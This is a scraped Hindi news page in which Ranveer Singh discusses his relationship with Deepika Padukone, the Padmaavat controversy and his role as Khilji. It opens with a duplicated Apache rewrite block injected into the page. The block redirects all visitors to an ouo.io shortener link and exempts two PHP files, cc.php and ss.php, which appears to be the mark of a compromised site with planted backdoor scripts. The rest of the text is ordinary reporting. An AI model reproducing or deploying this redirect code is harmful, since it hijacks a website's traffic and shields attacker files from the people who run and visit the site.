
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 308
Previous Nextमुंबई। राइजिंग इंडिया कार्यक्रम में शिरकत करने पहुंचे बॉलीवुड एक्टर रणवीर सिंह ने एक्ट्रेस दीपिका पादुकोण के साथ अपने रिश्ते के बारे में खुलकर बात की। इस दौरान उन्होंने रिलेशनशिप का अर्थ बताते हुए कहा कि रिलेशनशिप का मतलब होता है आपसी प्यार। हमारे रिलेशनशिप में मैं उन्हें एक्टिंग के स्तर पर काफी आगे रखता हूं और वो मुझे नहीं रखती हैं। मेरे पास उनसे सीखने के लिए काफी कुछ है। उन्हें अपनी जिंदगी में पाकर मुझे बहुत अच्छा महसूस होता है।" 'पद्मावत विवाद' के बारे में भी अपने निजी अनुभव दर्शकों के साथ साझा किए। उन्होंने कहा, "मैं हमेशा पॉजिटिव रहता हूं। जब पद्मावत विवाद हुआ, तब भी मैंने यही रवैया अपनाया। इस दौरान फिल्म इंडस्ट्री का खूब सपोर्ट मिला। फिल्म ने 300 करोड़ की कमाई की है। अब मैं अपनी अगली फिल्म पर काम कर रहा हूं।"
हालांकि, फिल्म के सेट को नुकसान पहुंचाने की घटना का जिक्र करते हुए रणवीर ने कहा, 'उस वक्त उन्हें बहुत गुस्सा आया था. वह चौंक गए थे कि ये सब साल 2017 में हो रहा है। जो मशीनें, कैमरे तोड़े गए उनसे हजारों लोगों का घर चलता है।' रणवीर ने कहा कि फिल्म का सेट उनके लिए मंदिर की तरह है। पद्मावत में अलाउद्दीन खिलजी का किरदार निभाने का अनुभव कैसा रहा। इस बारे में उनका कहना था," काफी मुश्किल हुई थी. मैं किरदार में पूरी तरह ढल गया था। लेकिन अब वो किरदार मेरे सिस्टम से बाहर निकल गया है।" रणवीर सिंह ने ऑडियंस में मौजूद लोगों के सवालों का भी मजेदार तरीके से जवाब दिया।